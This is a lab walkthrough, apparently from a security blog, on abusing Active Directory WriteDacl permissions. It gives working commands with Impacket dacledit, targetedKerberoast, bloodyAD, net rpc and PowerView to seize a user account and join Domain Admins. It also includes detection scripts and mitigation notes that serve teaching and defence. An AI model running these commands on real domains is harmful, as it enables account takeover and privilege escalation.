
Abusing AD-DACL: WriteDacl

In this post, we explore how attackers abuse the WriteDacl permission on Active Directory objects. A principal holding WriteDacl over an object can rewrite that object’s Discretionary Access Control List (DACL) and so grant itself whatever rights it needs to take the object over, or to reshape existing permissions to suit its objectives.

To demonstrate this, we build a lab environment and walk through the attack in two scenarios (WriteDacl over a user, and WriteDacl over the Domain Admins group), mapping each step to the MITRE ATT&CK framework. We also outline detection mechanisms for spotting WriteDacl abuse, along with actionable mitigation recommendations, so that security professionals can recognise and defend against this common Active Directory weakness.

Table of Contents

  • WriteDacl Permission
  • Prerequisites
  • Lab Setup – User Owns WriteDacl Permission on Another User
  • Exploitation Phase I – User Owns WriteDacl Permission on Another User
    • Bloodhound – Hunting for Weak Permission
    • Method for Exploitation – Granting Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1098)
      1. Linux Impacket tool – Granting Full Control
        • Linux Python Script – TargetedKerberoast
        • Linux – Change Password (Net RPC – Samba, BloodyAD)
      2. Windows PowerShell Powerview – Granting Full Control
        • Windows PowerShell Powerview – Kerberoasting
        • Windows PowerShell Powerview – Change Password
  • Lab Setup – User Owns WriteDacl Permission on the Domain Admins Group
  • Exploitation Phase II – User Owns WriteDacl Permission on a Group
    • Bloodhound – Hunting for Weak Permission
    • Method for Exploitation – Granting Full Control Followed by Account Manipulation (T1098)
      1. Linux Impacket tool – Granting Full Control
        • Linux – Adding Member to the Group (Net RPC – Samba, BloodyAD)
      2. Windows PowerShell Powerview – Granting Full Control
        • Windows Net command – Adding Member to the Group
  • Detection & Mitigation

WriteDacl Permission

The WriteDacl permission (the WRITE_DAC bit in an object’s security descriptor) allows a principal to modify the Discretionary Access Control List (DACL) of an Active Directory object, and therefore to decide who holds which permissions on it. An attacker who controls such a principal can write a new Access Control Entry (ACE) into the target’s DACL granting their own account GenericAll (full control), and from there do anything the object type allows.

Instead of granting full control, an attacker with WriteDacl on the domain object itself can add two ACEs carrying the extended rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, which is exactly what DCSync needs. Granting GenericAll produces the same outcome, because GenericAll includes every extended right, those two included.

What WriteDacl is worth depends on the type of object it applies to. On a group, it lets the attacker grant themselves WriteMembers and then add members, their own account included. On a user object, it lets them grant themselves full control over the account, which in turn enables a password reset or a targeted Kerberoast. On a computer object, it lets them take full control of the computer account. On the domain object, it lets them grant themselves the replication rights needed for DCSync, the most dangerous case of all.
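To make the ACE mechanics above concrete, here is a small Python script, added as an example (it is not part of the original post and not code from BloodHound, Impacket or any other tool named here), that parses the SDDL text form of an object’s security descriptor and lists which non-administrative principals hold rights that lead to object takeover: WriteDacl, WriteOwner, GenericAll, GenericWrite, write access to all properties, and the extended rights used for DCSync and ForceChangePassword. The SDDL strings, the domain SID S-1-5-21-1111111111-2222222222-3333333333 with RIDs 1105 (komal) and 1106 (rudra), and the list of trusted principals are constructed assumptions for the lab, not captured output.

```python
"""Scan an AD object's security descriptor (SDDL text) for ACEs that hand
object control to non-administrative principals: WriteDacl, WriteOwner,
GenericAll/GenericWrite, write access to all properties, and the extended
rights behind DCSync and ForceChangePassword.
Added example: every SDDL string and SID below is constructed for the lab."""
import re

# Access-mask bits behind the two-letter SDDL right tokens.
SDDL_RIGHTS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100,
}
FULL_CONTROL = 0x000F01FF  # all object-specific bits plus SD, RC, WD, WO

# controlAccessRight GUIDs relevant to this post.
EXTENDED_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
}

# Principals expected to control objects (SDDL aliases for Domain Admins,
# Enterprise Admins, Builtin Administrators, Local System).  Assumption:
# extend with the tier-0 SIDs of the domain you are scanning.
TRUSTED = frozenset({"DA", "EA", "BA", "SY"})


def parse_mask(rights):
    """Turn the SDDL rights field (hex, or concatenated tokens) into a bitmask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= SDDL_RIGHTS[rights[i:i + 2]]
    return mask


def parse_dacl(sddl):
    """Return (ace_type, mask, object_guid, trustee) for every ACE in the DACL."""
    match = re.search(r"D:(.*?)(?:S:|$)", sddl)
    if not match:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", match.group(1)):
        fields = body.split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, _flags, rights, obj_guid, _inherit_guid, trustee = fields[:6]
        aces.append((ace_type, parse_mask(rights), obj_guid.lower(), trustee))
    return aces


def takeover_paths(sddl, is_domain_object=False, trusted=TRUSTED):
    """Map each untrusted trustee to the sorted rights that let it take the object over."""
    found = {}
    for ace_type, mask, guid, trustee in parse_dacl(sddl):
        if ace_type not in ("A", "OA") or trustee in trusted:
            continue  # deny ACEs and expected admins are not attack paths
        labels = set()
        if mask & SDDL_RIGHTS["GA"] or (mask & FULL_CONTROL) == FULL_CONTROL:
            labels.add("GenericAll")
        if mask & SDDL_RIGHTS["GW"]:
            labels.add("GenericWrite")
        if mask & SDDL_RIGHTS["WD"]:
            labels.add("WriteDacl")
        if mask & SDDL_RIGHTS["WO"]:
            labels.add("WriteOwner")
        if mask & SDDL_RIGHTS["WP"] and not guid:
            labels.add("WriteAllProperties")  # covers servicePrincipalName
        if mask & SDDL_RIGHTS["CR"]:
            labels.add(EXTENDED_RIGHTS.get(guid, f"ExtendedRight:{guid}")
                       if guid else "AllExtendedRights")
        if labels:
            found.setdefault(trustee, set()).update(labels)
    if is_domain_object:  # replication rights only matter on the domain head
        for labels in found.values():
            if ({"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"} <= labels
                    or labels & {"GenericAll", "AllExtendedRights"}):
                labels.add("DCSync-capable")
    return {trustee: sorted(labels) for trustee, labels in found.items()}


# Constructed lab data: the domain SID and RIDs are made up.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
KOMAL, RUDRA = f"{DOMAIN_SID}-1105", f"{DOMAIN_SID}-1106"
# CN=aarti after the ADUC step: only Komal's WD (WriteDacl) ACE is unusual.
AARTI_BEFORE = ("O:DAG:DAD:AI"
                "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
                "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)"
                "(A;;RPLCLORC;;;AU)"
                f"(A;;WD;;;{KOMAL})")
# The same object after dacledit appended a FullControl ACE (hex mask form).
AARTI_AFTER = AARTI_BEFORE + f"(A;;0x000f01ff;;;{KOMAL})"
# Domain head where Rudra got only the two replication rights and Komal the
# ForceChangePassword right.
DOMAIN_HEAD = ("O:DAG:DAD:"
               f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{RUDRA})"
               f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{RUDRA})"
               f"(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;{KOMAL})")

if __name__ == "__main__":
    for name, sddl, on_domain in (("aarti, lab state", AARTI_BEFORE, False),
                                  ("aarti, after dacledit", AARTI_AFTER, False),
                                  ("domain head", DOMAIN_HEAD, True)):
        print(f"{name}: {takeover_paths(sddl, is_domain_object=on_domain)}")
```

On a domain-joined Windows host with the ActiveDirectory module loaded, `(Get-Acl "AD:\CN=aarti,CN=Users,DC=ignite,DC=local").Sddl` returns the real string to feed in. The DCSync-capable label is only applied when the caller states that the descriptor belongs to the domain head, because the two replication rights mean nothing on a user or group object; a principal holding GenericAll or all extended rights there is flagged as well, since those include the replication rights.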

Prerequisites

  • Windows Server 2019 as the Domain Controller
  • Kali Linux
  • Tools: Bloodhound, Net RPC, Powerview, BloodyAD, Impacket
  • Windows 10/11 – As Client

Lab Setup – User Owns WriteDacl Permission on Another User

In this lab setup, we create two users, Aarti and Komal, and give Komal the WriteDacl permission over the Aarti user object.

Create the AD Environment and User accounts

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

  • Install Windows Server (2016 or 2019 recommended).
  • Promote it to a Domain Controller by adding the Active Directory Domain Services role.
  • Set up the domain (here ignite.local).

User Accounts:

  • Create two AD user accounts named Aarti and Komal.
net user aarti Password@1 /add /domain
net user komal Password@1 /add /domain

Assign the “WriteDacl” Privilege:

  • Open Active Directory Users and Computers (ADUC) on the Domain Controller.
  • Enable the Advanced Features view by clicking View > Advanced Features.
  • Locate the user Aarti in the Users container.
  • Right-click Aarti and go to Properties.
  • Go to the Security tab and click the Add button.
  • In the “Enter the object name to select” box, type Komal, click Check Names and click OK.
  • Select the Komal entry in the Permissions section and click Advanced.
  • In the Advanced Security Settings dialog, double-click Komal’s permission entry.
  • In the Permissions section, tick Modify permissions (this is the WriteDacl right) and apply the settings.

At this point, Komal holds WriteDacl over Aarti. Komal cannot yet reset Aarti’s password or write Aarti’s attributes, but can grant themselves the rights to do so.

Exploitation Phase I – User Owns WriteDacl Permission on Another User

Bloodhound – Hunting for Weak Permission

Use BloodHound to confirm the privilege. Collect the domain as komal with bloodhound-python and verify that BloodHound draws a WriteDacl edge from komal to aarti:

bloodhound-python -u komal -p Password@1 -ns 192.168.1.3 -d ignite.local -c All

In the BloodHound GUI, select the komal node and open Outbound Object Control in the node info panel; First Degree Object Control shows 1, and expanding it renders the graph below.

The graph confirms that komal holds WriteDacl over aarti.

Method for Exploitation – Granting Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1098)

Attackers use this method when they control a principal that has WriteDacl over another object.

Linux Impacket tool – Granting Full Control

From UNIX-like systems, attackers can grant themselves full control with Impacket‘s dacledit.py (packaged on Kali as impacket-dacledit):

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'komal' -target-dn 'CN=aarti,CN=Users,DC=ignite,DC=local' 'ignite.local'/'komal':'Password@1' -dc-ip 192.168.1.3

dacledit appends an ACE granting komal FullControl (GenericAll) over aarti; komal’s existing WriteDacl right is what makes the write succeed.

With full control over the target, komal can either set a service principal name on aarti and Kerberoast the account, or reset aarti’s password without knowing the current one (the User-Force-Change-Password extended right is included in GenericAll).

Linux Python Script – TargetedKerberoast

From UNIX-like systems, attackers can run a targeted Kerberoast with targetedKerberoast.py (Python). The script sets a temporary SPN on every user the supplied account can modify, requests a service ticket for it, prints the ticket hash and then removes the SPN again:

./targetedKerberoast.py --dc-ip '192.168.1.3' -v -d 'ignite.local' -u 'komal' -p 'Password@1'

The resulting TGS hash is then cracked offline, for example with John the Ripper or hashcat (mode 13100 for RC4 tickets) and a wordlist such as RockYou. Only a weak password on aarti falls to this step; resetting the password (below) always works, but locks the legitimate user out and is far noisier.

Linux – Change Password

Linux Net RPC – Samba

Attackers can also reset the password from UNIX-like systems with net, the Samba administration tool, over RPC, authenticating as komal:

net rpc password aarti 'Password@987' -U ignite.local/komal%'Password@1' -S 192.168.1.3

Linux Bloody AD

Alternatively, attackers can use bloodyAD to reset the user password:

bloodyAD --host "192.168.1.3" -d "ignite.local" -u "komal" -p "Password@1" set password "aarti" "Password@789"

Windows PowerShell Powerview – Granting Full Control

From a Windows system, attackers can grant full control using the Add-DomainObjectAcl function from the PowerView module:

powershell -ep bypass
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "aarti" -PrincipalIdentity "komal"


Add-DomainObjectAcl modifies the target’s DACL so that komal has full control (GenericAll) over aarti.

As before, with full control the attacker can either Kerberoast the account or reset its password without knowing the current one (ForceChangePassword is part of GenericAll).

Windows PowerShell Powerview – Kerberoasting

On Windows, attackers perform the targeted Kerberoast with PowerView by writing an SPN onto aarti with Set-DomainObject and then requesting a service ticket for it with Get-DomainSPNTicket:

Set-DomainObject -Identity 'aarti' -Set @{serviceprincipalname='nonexistent/hacking'}
Get-DomainUser 'aarti' | Select serviceprincipalname
$User = Get-DomainUser 'aarti'
$User | Get-DomainSPNTicket

Windows PowerShell Powerview – Change Password

Attackers can also reset the user’s password with PowerView’s Set-DomainUserPassword function:

$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force
Set-DomainUserPassword -Identity 'aarti' -AccountPassword $NewPassword

Lab Setup – User Owns WriteDacl Permission on the Domain Admins Group

Create the AD Environment:

The domain controller and the ignite.local domain from the first lab are reused here; only one additional user account is needed.

User Accounts:

  • Create a standard user account named Rudra.
net user rudra Password@1 /add /domain

Assign the “WriteDacl” Privilege to Rudra:

Once the Active Directory (AD) environment is configured, assign the WriteDacl privilege to the user Rudra on the Domain Admins group. This privilege lets Rudra rewrite the group’s DACL and, from there, add themselves to the group.

Steps:

  • Open Active Directory Users and Computers (ADUC) on the Domain Controller.
  • Enable the Advanced Features view by clicking View > Advanced Features.
  • Locate the Domain Admins group in the Users container.
  • Right-click Domain Admins and go to Properties.
  • Go to the Security tab and click the Add button.
  • In the “Enter the object name to select” box, type Rudra, click Check Names and click OK.
  • Select the Rudra entry in the Permissions section and click Advanced.
  • In the Advanced Security Settings dialog, double-click Rudra’s permission entry.
  • In the Permissions section, tick Modify permissions (this is the WriteDacl right) and apply the settings.

At this point, Rudra holds WriteDacl over the Domain Admins group. Rudra cannot yet add members, but can grant themselves the right to do so.

Exploitation Phase II – User Owns WriteDacl Permission on a Group

Bloodhound – Hunting for Weak Permission

Use BloodHound to confirm the privilege. Collect the domain as rudra and verify that BloodHound draws a WriteDacl edge from rudra to the Domain Admins group:

bloodhound-python -u rudra -p Password@1 -ns 192.168.1.3 -d ignite.local -c All

In the BloodHound GUI, select the rudra node and open Outbound Object Control; First Degree Object Control shows 1, and expanding it renders the graph below.

The graph confirms that rudra holds WriteDacl over the Domain Admins group.

Method for Exploitation – Granting Full Control Followed by Account Manipulation (T1098)

Linux Impacket tool – Granting Full Control

From UNIX-like systems, this is done with Impacket‘s dacledit.py (packaged on Kali as impacket-dacledit):

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'rudra' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'rudra':'Password@1' -dc-ip 192.168.1.3

dacledit appends an ACE granting rudra WriteMembers on Domain Admins, that is, write access to the group’s member attribute. This is all the next step needs; passing -rights 'FullControl' instead would also work, but leaves a more conspicuous ACE behind.

Linux – Adding Member to the Group

Linux Net RPC – Samba

The tester abuses the new right by adding rudra to Domain Admins, then lists the group’s members to confirm that rudra is now a Domain Admin:

net rpc group addmem "Domain Admins" rudra -U ignite.local/rudra%'Password@1' -S 192.168.1.3

Linux Bloody AD

Alternatively, the same can be done with bloodyAD:

bloodyAD --host "192.168.1.3" -d "ignite.local" -u "rudra" -p "Password@1" add groupMember "Domain Admins" "rudra"

Windows PowerShell Powerview – Granting Full Control

From a Windows system, this can be achieved with Add-DomainObjectAcl (PowerView module).

powershell -ep bypass
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Domain Admins" -PrincipalIdentity "rudra"

Windows Net command – Adding Member to the Group

On Windows, the same can be done with the built-in net command:

net group "domain admins" rudra /add /domain

The user’s Member Of tab in ADUC now lists Domain Admins. Note that group membership is evaluated at logon: rudra has to log on again (or obtain fresh Kerberos tickets) before the new privileges take effect.

Detection & Mitigation
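As an added example for this section (not code from the original post or from any of the tools it uses), the following Python script runs detection logic over constructed Security-log events in the shape a SIEM produces after parsing: 5136 (directory service object modified, with the changed attribute), 4724 (password reset attempt), 4728/4732/4756 (member added to a group) and 4769 (Kerberos service ticket requested). It flags the individual indicators each step of the two chains above leaves behind, and raises a high-severity alert when a DACL change is followed within a window by a takeover action from the same account. The event records, account names, the 30-minute window and the list of accounts allowed to edit ACLs are assumptions for the lab.

```python
"""Detection logic for the traces a WriteDacl chain leaves in the Windows
Security log: 5136 (directory service object modified), 4724 (password reset
attempt), 4728/4732/4756 (member added to a group) and 4769 (Kerberos
service ticket requested).  Added example; every event below is constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

TIER0_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins"}
# Assumption: the only accounts expected to edit ACLs or reset other users'
# passwords in this lab.  Feed your real tier-0 list here.
ACL_ADMINS = {"Administrator"}
FOLLOW_UPS = {"spn_added", "password_reset", "tier0_group_add"}

# Constructed events, in the shape a SIEM yields after parsing the Security log
# (field subset).  Komal follows the Phase I chain, Rudra the Phase II chain,
# Administrator is benign noise.
EVENTS = [
    {"t": "2024-05-01T09:00:00", "id": 4724, "subject": "Administrator", "target": "helpdesk01"},
    {"t": "2024-05-01T09:10:00", "id": 5136, "subject": "Administrator",
     "object": "OU=Sales,DC=ignite,DC=local", "attr": "nTSecurityDescriptor"},
    {"t": "2024-05-01T10:00:02", "id": 5136, "subject": "komal",
     "object": "CN=aarti,CN=Users,DC=ignite,DC=local", "attr": "nTSecurityDescriptor"},
    {"t": "2024-05-01T10:00:40", "id": 5136, "subject": "komal",
     "object": "CN=aarti,CN=Users,DC=ignite,DC=local", "attr": "servicePrincipalName"},
    {"t": "2024-05-01T10:01:10", "id": 4769, "subject": "komal", "service": "aarti", "etype": "0x17"},
    {"t": "2024-05-01T10:03:00", "id": 4724, "subject": "komal", "target": "aarti"},
    {"t": "2024-05-01T11:00:00", "id": 5136, "subject": "rudra",
     "object": "CN=Domain Admins,CN=Users,DC=ignite,DC=local", "attr": "nTSecurityDescriptor"},
    {"t": "2024-05-01T11:00:30", "id": 4728, "subject": "rudra", "member": "rudra", "group": "Domain Admins"},
]


def classify(ev):
    """Label one event with the indicator it represents, or None if benign."""
    subj, eid = ev["subject"], ev["id"]
    if eid == 5136 and subj not in ACL_ADMINS:
        if ev["attr"] == "nTSecurityDescriptor":
            return "dacl_modified"       # someone rewrote an object's DACL
        if ev["attr"] == "servicePrincipalName":
            return "spn_added"           # targeted-Kerberoast preparation
    if eid == 4769 and ev.get("etype") == "0x17":
        return "rc4_tgs_requested"       # RC4 service ticket: crackable offline
    if eid == 4724 and subj != ev["target"] and subj not in ACL_ADMINS:
        return "password_reset"          # reset of somebody else's password
    if eid in (4728, 4732, 4756) and ev["group"] in TIER0_GROUPS:
        return "tier0_group_add"
    return None


def indicators(events):
    """Single-event (medium severity) indicators as (label, subject), time-ordered."""
    ordered = sorted(events, key=lambda e: e["t"])
    return [(classify(ev), ev["subject"]) for ev in ordered if classify(ev)]


def correlate(events, window_minutes=30):
    """High-severity alert: a DACL change by a subject followed within the window
    by a takeover action (SPN write, password reset, tier-0 group add) from the
    same subject.  This is the dacledit -> abuse sequence of the post."""
    timeline = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["t"]):
        label = classify(ev)
        if label:
            timeline[ev["subject"]].append((datetime.fromisoformat(ev["t"]), label, ev))
    alerts = []
    for subj, items in timeline.items():
        for i, (t0, label0, ev0) in enumerate(items):
            if label0 != "dacl_modified":
                continue
            for t1, label1, _ev1 in items[i + 1:]:
                if t1 - t0 > timedelta(minutes=window_minutes):
                    break  # items are time-ordered, nothing later can qualify
                if label1 in FOLLOW_UPS:
                    alerts.append({"subject": subj, "dacl_target": ev0["object"],
                                   "follow_up": label1, "at": t1.isoformat(),
                                   "severity": "high"})
    return alerts


if __name__ == "__main__":
    for label, subj in indicators(EVENTS):
        print(f"indicator {label:<18} by {subj}")
    for alert in correlate(EVENTS):
        print(f"ALERT {alert['severity']}: {alert['subject']} modified the DACL of "
              f"{alert['dacl_target']} then performed {alert['follow_up']} at {alert['at']}")
```

Event 5136 is only generated when the Directory Service Changes audit subcategory is enabled and the object’s SACL audits writes to the relevant attributes; the new SDDL is carried in the event’s AttributeValue field. Event 4724 comes from User Account Management auditing, 4728 from Security Group Management and 4769 from Kerberos Service Ticket Operations. The correlation keys on the subject account, which points at the mitigation the chains above call for: no principal outside tier 0 should hold WriteDacl, WriteOwner or GenericAll on users, groups or the domain head, and any ACE that grants them should be found and removed before an attacker finds it.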